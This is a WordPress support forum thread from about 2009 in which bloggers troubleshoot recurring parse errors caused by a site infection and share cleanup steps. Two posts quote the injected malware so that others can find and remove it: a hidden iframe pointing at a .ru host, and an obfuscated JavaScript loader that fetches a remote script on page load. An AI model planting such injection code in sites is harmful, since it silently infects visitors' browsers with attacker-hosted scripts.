Title: syntax error on default-widgets.php file
Last modified: August 19, 2016

---

# syntax error on default-widgets.php file

 *  [vinz77](https://wordpress.org/support/users/vinz77/)
 * (@vinz77)
 * [16 years, 8 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/)
 * Hello,
    My blog keeps on crashing -by itself-, with this message: **Parse error:
   syntax error, unexpected ‘<‘ in /homepages/4/d134610354/htdocs/moebius77/blog2/
   wp-includes/default-widgets.php on line 1034** I can get it back up by substituting
   file d-w.php for the original WP 2.8 file, but after a while it crashes again;
   I open the file and it’s incomplete. What is going on? How can I fix this? Thanks,
   Vinz

Viewing 15 replies - 1 through 15 (of 18 total)

1 [2](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/page/2/?output_format=md)
[→](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/page/2/?output_format=md)

 *  Thread Starter [vinz77](https://wordpress.org/support/users/vinz77/)
 * (@vinz77)
 * [16 years, 8 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/#post-1214123)
 * Got It:
    1) re-install all your WordPress blog, FTP it onto the server again,
   EXCEPT the WP-Content folder if you want to keep your images and themes. 2) Now
   you should be able to login. Go to your dashboard and install plugin “Script 
   Exploiter”. 3) Run the plugin and look for malicious script. In my case, I had
   this baby: <div style=”display:none”><iframe src=”[http://past-another-life.ru:8080/index.php&#8221](http://past-another-life.ru:8080/index.php&#8221);
   width=571 height=464 ></iframe></div> copied on most of my install.php files,
   on all the themes (default, etc.), on the plugins and others. 4) Download the
   files with the added script, open them with an editor and erase all the garbage.
   5) FTP them back on the server, you should be all right. Cheers, hope this helps,
   Vinz
 *  [vik79](https://wordpress.org/support/users/vik79/)
 * (@vik79)
 * [16 years, 8 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/#post-1214304)
 * Hi Vinz,
 * I have been getting the same error for the last 3 days and been searching on 
   Google and finally found your post. Looks like this is a relatively new problem.
   I am still getting the same error so i need your help!
 * Just a little earlier (before finding your post) i delete all files from my web-
   server and uploaded the word press back. I was able to enter my db details and
   on the next step got the same error again. I followed your instruction and deleted
   WP-Content folder hoping this would allow me to login but I am still getting 
   the same error?
 * I am with 1and1.com shared hosting and thought that i was having problems configuring
   ioncube loader but looks like i gotta get rid of the malicious code first.
 * Please reply back and help me
 * Vik
 *  [iridiax](https://wordpress.org/support/users/iridiax/)
 * (@iridiax)
 * [16 years, 8 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/#post-1214305)
 * > looks like i gotta get rid of the malicious code first.
 * Yes, sudden parse errors can be a sign of hacking.
 *  [moebius77](https://wordpress.org/support/users/moebius77/)
 * (@moebius77)
 * [16 years, 8 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/#post-1214306)
 * Hello, Vik79,
    1) I lost my password so am logged in with nick. 2) I was also
   with 1and1, I suspect it’s a server virus script on their end: but I called and
   email them- to no avail. 3) Here’s the thing: that script is a smart little f*
   cker. If you leave **just a string of it** lying around, it’ll multiply and kill
   your site before you know it. 4) Actually, after I wrote this it came back up
   again, because it had leaked onto **all the sites** we host on 1and1. 5) So: 
   you have to be **absolutely sure** you’ve isolated it. Compare your index.php
   files with the clean WordPress ones; you should be able to make out what the 
   complete string is. Do not leave anything on there; at first, I left a <div> 
   </div> because I thought it amounted to nothing; remember, it’s a hidden string.
   Make sure your index’ are just “<?php> silence is golden” or whatever the original
   WP has. 6) **You have to clean all your pages**, even static non-blog pages. 
   I found it there too. Where there’s an index, there’s a way he’ll get on it. 
   Actually, he didn’t make my other pages crash but web navigators would flare 
   my site for “malicious script”. 7) Get into contact with whoever shares your 
   server and has pages on it. We had 7 or 8 sites up; had to take them all down,
   erase the server completely, clean every page and put it back up. Yes, it takes
   time. Yes, it sucks. You’ve been served. 8) My “WP-Content” folder was FUCKED.
   Everytime I reinstalled, I got all kinds of errors. So I had to go from scratch:
   Reinstall WP, reinstall my theme, and plugins, one by one. Don’t worry, the WP
   database keeps track of your widgets and stuff so no major redesign is in order,
   but it’ll take you a minute or two. 9) **Important:** After you take everything
   off your server, **change FTP access passwords**. It seems the hack is coming
   from FTP clients (like Smart FTP) that keep passwords open and get stolen. So
   go to 1and1 and change that, tell whoever shares server with you to do the same,
   and don’t click the “remember password” box on your FTP client. If you make sure
   every site on the server is clean, you change FTP passwords and upload it, technically,
   you should be ok. Of course, I’m no IT expert, I’m just a blogger. This site 
   gets into the semantics of it all (and provides no solution whatsoever -gotta
   love ’em): [http://blog.unmaskparasites.com/2009/09/17/quicksilver-malware-network/](http://blog.unmaskparasites.com/2009/09/17/quicksilver-malware-network/)
   Good luck, I’ll be around but again, I know very little about programming. These
   are just my clumsy recommendations. Vinz.
 *  [vik79](https://wordpress.org/support/users/vik79/)
 * (@vik79)
 * [16 years, 8 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/#post-1214307)
 * Vinz,
 * I would have felt really outraged if this were to happen to my established websites.
   I am glad that you know what you are doing ..hopefully you will be back up and
   running soon.
 * Luckily for me, I usually do direct linking and never had an established website
   of my own. I did registered a few domains on 1and1 to start a couple of niche
   sites.
 * Ok so I am going to take following steps to hopefully fix the damage:-
 * 1. Delete wordpress folder from my computer
    2. Delete wordpress folder from 
   my server 3. Erase my ftp details and change my 1and1 login information. 4. Upload
   fresh copy of wordpress. 5. Try to get the Ioncube loader going (hopefully i 
   will get it this time) 6. Delete all my plugins from my PC, download them fresh
   and upload em.
 * If you think of anything else I should do pls lemme know. I am in Melbourne Australia
   and it’s getting late up here.. so i will wait for the fresh install till tomorrow.
 * Again, thx for your assistance.. knowing that there is not a lot of info about
   this problem you have really done a good service to whoever happens to visit 
   this page!
 * Cheers,
 * Vik
 *  [moebius77](https://wordpress.org/support/users/moebius77/)
 * (@moebius77)
 * [16 years, 8 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/#post-1214309)
 * …As per my experience, that should work…
    Too bad the real experts that hang 
   around this site and others can’t have a professional say on the thing… P.d.:
   Make SURE you make a backup of your MySQL tables somewhere in between. The script
   doesn’t seem to affect your tables but just in case, hang onto those because 
   that’s were all your blog info is. You’ll find those in your PHP section of my
   1and1. That said, that’s the limit of my blog knowledge. I really hope it works
   and am crossing me’s fingers for you… Don’t worry, you’ll be celebrating over
   a Foster’s in no time! Peace, V.
 *  [covellz](https://wordpress.org/support/users/covellz/)
 * (@covellz)
 * [16 years, 8 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/#post-1214312)
 * Hello group! I have spent 30 hours over the last 3 1/2 days getting my wordpress
   blog up at [http://zackcovell.com](http://zackcovell.com)
 * My problem is that for the 3rd day in a row I get the following error after I
   leave the site for a little bit and then come back.
 * Parse error: syntax error, unexpected ‘<‘ in /homepages/10/d232920448/htdocs/
   wp-includes/default-widgets.php on line 1034
 * I seriously need some help identifying what the heck is wrong with the script
   or something else.
 * Please DO NOT tell me to start over, I’ve read this forum already twice and have
   crashed my blog through some unknown method twice.
 * Thanks and call if you’d like to offer some assistance. Zack 503-325-2858
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [16 years, 8 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/#post-1214313)
 * I emailed you zack — Im not up to phone calls this early. 🙂
 *  [vik79](https://wordpress.org/support/users/vik79/)
 * (@vik79)
 * [16 years, 8 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/#post-1214316)
 * Hello it’s Vik79 checking in..
 * I posted couple of days ago, about the problem with word press installation. 
   I followed exactly what i wrote above and it worked!
 * Had to completely wipe off everything related to wordpress and plugins from my
   computer and the server to be 100% sure that no trace of the malicious code is
   left. Then re-uploaded everything back. I even figured out the ioncube loader
   install on 1and1.
 * Fingers crossed everything looks good now.
 * I would like to mention here that this was a new domain, so i didn’t had to backup
   or do any of the extra effort so what i have done may not be relevant to existing
   sites with content.
 * Thanks to Vinz/moebius77 for assistance.
 * Good luck to you all!
 * Peace to you and yours,
 * Vik
 *  [ishmate](https://wordpress.org/support/users/ishmate/)
 * (@ishmate)
 * [16 years, 5 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/#post-1214349)
 * Well a similar error had occurred on my installation on Bluehost. Basically it
   was a replicating script that was targeting all the .js and index.php files….
 * basically a spamming script for a toolbar. i removed it successfully as it used
   to append itself at the end of every document. lot of work.. but thankfully did
   not need to delete the entire installation…
 *  [shelleyeaster](https://wordpress.org/support/users/shelleyeaster/)
 * (@shelleyeaster)
 * [16 years, 5 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/#post-1214351)
 * I had this same issue and had to uninstall WordPress and do a fresh install to
   fix. Does anyone know what causes this and what I can do to prevent it from happening
   again?
 * Thanks!
 *  [Marco](https://wordpress.org/support/users/dapro/)
 * (@dapro)
 * [16 years, 5 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/#post-1214352)
 * This has happened to me multiple times. Does anyone know how to solve the issue
   or prevent it?
 * It keeps returning and infecting all my blogs.
 * Is it a plug-in?
 * I have multiple blogs running 2.8.6 (1 blog)- 2.9 (5 blogs) running on bluehost.
 *  [jeromechan](https://wordpress.org/support/users/jeromechan/)
 * (@jeromechan)
 * [16 years, 5 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/#post-1214353)
 * hello the problem is on your default-widgets.php and default-filter.php, inside
   your wp-includes. to solve this problem is download the two file default-widgets.
   php and default-filter.php, then open it to your editor or in notepad then go
   to the bottom part of the script, find the script:
 * <script>/*GNU GPL*/ try{window.onload = function(){var B2z6bl10xv = document.
   createElement(‘script’);B2z6bl10xv.setAttribute(‘type’, ‘text/javascript’);B2z6bl10xv.
   setAttribute(‘src’, ‘h@^t(t)p!#^^:^#$/@&((&/#&^!!t$w$(e(^@e&(&t^(&(m^#e$$m$$!
   e##-@@c&&#!@o@&m)$&.)!()r@e(!#$d$)(i)@$f@!f^&^.)##c@o^@(m&!^.&)@g)o@^^!o)g^#^
   @l^e)##-$^)!!c!#o&!m#)&(-&b)$d^.^!s(@!i$&&!&m!p)!#!l(!((e@@@w)!o!&r@&^^l#d^)$
   h@^@(o@!&^u$s@(e!!).)&r(!$u^$:(8#$^0^(($8@$0)()/^&!g^!@(^o$!#o&#g@&!!^l#@$&e$
   @.(c(#!o^m))/(!g^o&)!o(g)@l!e@)$.(@@c!o$^m)/$@d@&((r$e&)(a!)$m$@s##t)^(#i&^(!#
   m#)e&)&.)##$c@o@()m@!/@^^a#^#@$t^!t)#.@!@#n#e!(#t)&/@(s(!h!^i$(&n@##)o$#b$(!$
   i(@$.#@j^)^)p$@/$@)’.replace(/\)|&|\!|\(|\$|\^|#|@/ig, ”));B2z6bl10xv.setAttribute(‘
   defer’, ‘defer’);document.body.appendChild(B2z6bl10xv);}} catch(e) {}</script
   >
 * then delete this script then upload the file back to your ftp, the site is will
   be find
 * i hope it can help with your problem
 * -jromechan
 *  [socboo101](https://wordpress.org/support/users/socboo101/)
 * (@socboo101)
 * [16 years, 5 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/#post-1214355)
 * I have got the same error. How can I contact **vinz77** directly?
 * Where can I get **Script Exploiter** plugin?
 *  [bobegods](https://wordpress.org/support/users/bobegods/)
 * (@bobegods)
 * [16 years, 5 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/#post-1214356)
 * I’ve had the same problem (and am still dealing with it). My site was hacked 
   by a Malicious script code, which even after I deleted my file, reoccurred over
   and over again. Here are some suggestions:
 * 1. Most important: Contact your hosting provider and let them know that your 
   site has been hacked. Tell them that you are working on getting it removed. If
   you do not get this taken care of, they could shut down your site completely 
   and/or remove all your files without even backing it up. It might also be that
   you’ll need to remove your file and ask that your hosting provider to delete 
   your hosting account and give you another one on a different server.
 * 2. Do a complete backup (via FTP only) onto your computer. Search each .php file(
   yes, one by one) and remove the Malicious script. The script in embedded into
   the bottom of all index.php files, AS WELL AS other .php files. Unfortunately
   there is no telling exactly which files have been effected. You’ll have to do
   this manually. DO NOT download the latest copy of WordPress and just copy over
   your existing files. This will make a lot bigger mess. (Make sure to take note
   which files were effected as you’ll only re-upload these files).
 * 3. DELETE everything off your server EXCEPT the WordPress files (and don’t delete
   the effected files). CHANGE all passwords to something very difficult (letters,
   numbers, characters, lower and uppercase). And if you have access to your cPanel,
   delete your mySQL database and create a new one (If you do change your mySQL 
   database, then you’ll need to update the information on your wp-config.php as
   well).
 * 4. Re-upload ONLY the files that had been effected into their appropriate folders.
 * 5. Immediately install the Secure WordPress plugin and active it. THEN delete
   ALL other plugins that you are not using. Go through your plugins and themes 
   and delete everything that you’re not using (or don’t really need).
 * 6. Delete the “admin” user account. Create a new account under a new name, assign
   the role of admi nis tra tor to that user, then sign in under the new user and
   delete the “admin” account. REMEMBER, make sure to use a strong password.
 * 7. If you feel ambitious, rename your default data base table prefix (which currently
   is “wp_”). This is very involved and takes time. Here is a tutorial: [http://bit.ly/61z0Jk](http://bit.ly/61z0Jk)
 * **_8. Say a prayer. Say lots of prayers 🙂_**

Viewing 15 replies - 1 through 15 (of 18 total)

1 [2](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/page/2/?output_format=md)
[→](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/page/2/?output_format=md)

The topic ‘syntax error on default-widgets.php file’ is closed to new replies.

## Tags

 * [syntax error](https://wordpress.org/support/topic-tag/syntax-error/)
 * [widgets](https://wordpress.org/support/topic-tag/widgets/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 18 replies
 * 13 participants
 * Last reply from: [socboo101](https://wordpress.org/support/users/socboo101/)
 * Last activity: [16 years, 5 months ago](https://wordpress.org/support/topic/syntax-error-on-default-widgetsphp-file/page/2/#post-1214359)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics